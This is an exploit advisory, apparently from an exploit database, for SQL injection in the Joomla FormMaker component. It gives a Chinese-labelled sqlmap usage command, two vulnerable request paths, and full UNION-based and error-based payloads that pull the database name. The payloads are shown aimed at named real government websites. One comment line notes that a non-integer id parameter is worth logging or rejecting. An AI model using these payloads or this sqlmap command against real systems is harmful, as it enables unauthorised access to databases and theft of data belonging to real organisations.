使用说明:
python sqlmap.py -u "http://localhost/index.php?option=com_formmaker&view=formmaker&id=-5653&Itemid=45" --dbs
######################################################################
# Exploit Title: Joomla FormMaker Component - SQL Injection Vulnerability
# Google Dork: Y0ur Brain
# Date: 28.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://extensions.joomla.org/extension/form-maker
# Tested on: Windows
######################################################################
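# Exploit : index.php?option=com_formmaker&view=formmaker&id=-5653 {SQLi}&Itemid=45
# index.php?option=com_formmaker&task=paypal_info&tmpl=component&id=-1 {SQLi}
# In both requests the injection point, marked {SQLi}, is the `id` parameter, which carries an integer in every example on this page; a com_formmaker request whose `id` is anything other than a plain integer is therefore worth logging or rejecting.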
# ~ Demo ~ # $>
# Example :
# Type: MySQL UNION query (NULL) - with 28 columns
# URI: [url]http://www.cabinet.gov.zm/index.php?option=com_formmaker&view=formmaker&id=-5653[/url] UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707671,IFNULL(CAST(database() AS CHAR),0x20),0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Itemid=45
# Other Example :
# Type: error-based
# URI: [url]http://www.ppsppa.gov.my/index.php/ms/?option=com_formmaker&view=formmaker&id=1[/url] AND (SELECT 4784 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x71706b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Itemid=837
# sh00t5 To SQL_master :D